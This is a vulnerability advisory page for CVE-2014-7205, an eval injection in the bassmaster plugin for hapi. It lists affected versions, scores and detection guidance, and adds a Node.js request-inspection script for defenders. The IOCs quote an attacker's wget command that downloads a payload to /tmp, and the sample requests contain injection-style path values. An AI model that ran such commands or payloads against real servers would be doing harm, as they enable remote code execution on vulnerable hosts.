CVE-2014-7205
published 2014-10-08

CVE-2014-7205: Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js…

Priority: P274, critical, 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 78.58% (99.5th percentile)
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js allows remote attackers to execute arbitrary Javascript code via unspecified vectors.

Affected

2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bassmaster_project | bassmaster | < 1.5.2 | 1.5.2 |
| bassmaster_project | bassmaster | >= 0 < 1.5.2 | 1.5.2 |

Detection & IOCs (extracted from sources)

path: /batch
port: 8080
command: wget ${@service_url} -O \x2ftmp\x2f${@bd};
  • Detect POST requests to the /batch endpoint containing nested JSON with a 'requests' array where a 'path' value includes JavaScript injection patterns such as appended expressions (e.g., +'<string>') matching the regex /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g
  • Flag HTTP POST requests to /batch with Content-Type application/json where path values in the requests array contain JavaScript operators or string concatenation characters (e.g., +', eval-injectable payloads) beyond normal path characters
  • Look for use of \x2f (hex-encoded forward slash) in HTTP request bodies targeting the batch endpoint, used to bypass regex matching while injecting code
  • Monitor for outbound wget requests from the Node.js server process to attacker-controlled hosts on non-standard ports (default 1337), followed by execution of a newly written binary in /tmp/
  • The vulnerable route path (/batch) and server port (8080) are defaults from the examples/batch.js file; production deployments may use different paths and ports, requiring tuning of detection rules accordingly.
  • The exploit targets unauthenticated access to the batch endpoint; if the deployment requires authentication, the attack surface is reduced but the underlying eval injection vulnerability in lib/batch.js still exists in bassmaster < 1.5.2.
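
Added example (not from the original page or the bassmaster project): a Node.js check that applies the first three detection bullets above to constructed request records. The record shape, the function names and the allowlist of plain path characters are assumptions to tune per deployment.

```javascript
// Added example; function names, record shape and allowlist are assumptions.
const BATCH_PATH = '/batch'; // default from examples/batch.js; tune per deployment
// Assumed allowlist for legitimate sub-request paths ("$" and "." cover
// "$0.id"-style references to earlier results in the same batch).
const PLAIN_PATH = /^[A-Za-z0-9\/_.~%$?=&-]*$/;
const HEX_SLASH = /\\x2f/i; // the literal text "\x2f" in the raw body

function inspectBatchRequest(req) {
  const findings = [];
  const url = req.url.split('?')[0];
  if (req.method.toUpperCase() !== 'POST' || !url.endsWith(BATCH_PATH)) {
    return findings; // not a batch call, nothing to check
  }
  if (HEX_SLASH.test(req.body)) findings.push('hex-encoded slash in body');
  let parsed;
  try {
    parsed = JSON.parse(req.body);
  } catch (err) {
    findings.push('unparsable JSON body');
    return findings;
  }
  const requests = Array.isArray(parsed && parsed.requests) ? parsed.requests : [];
  requests.forEach((sub, i) => {
    if (!sub || typeof sub.path !== 'string') {
      findings.push(`requests[${i}].path is not a string`);
    } else if (!PLAIN_PATH.test(sub.path)) {
      findings.push(`requests[${i}].path has non-path characters`);
    }
  });
  return findings;
}

// Constructed sample requests (not captured traffic).
const toBody = (paths) =>
  JSON.stringify({ requests: paths.map((path) => ({ method: 'get', path })) });
const SAMPLES = [
  { method: 'POST', url: '/batch', body: toBody(['/profile', '/item/$0.id']) },
  { method: 'POST', url: '/batch', body: toBody(["/item/$0.id+'<string>'"]) },
  { method: 'POST', url: '/batch', body: toBody(['/item\\x2f$0.id']) },
  { method: 'GET', url: '/status', body: '' },
];

function runSamples() {
  return SAMPLES.map(inspectBatchRequest);
}

console.log(JSON.stringify(runSamples(), null, 2));
```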

CVSS provenance

nvd: v2.0, 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
osv: 5.5 MEDIUM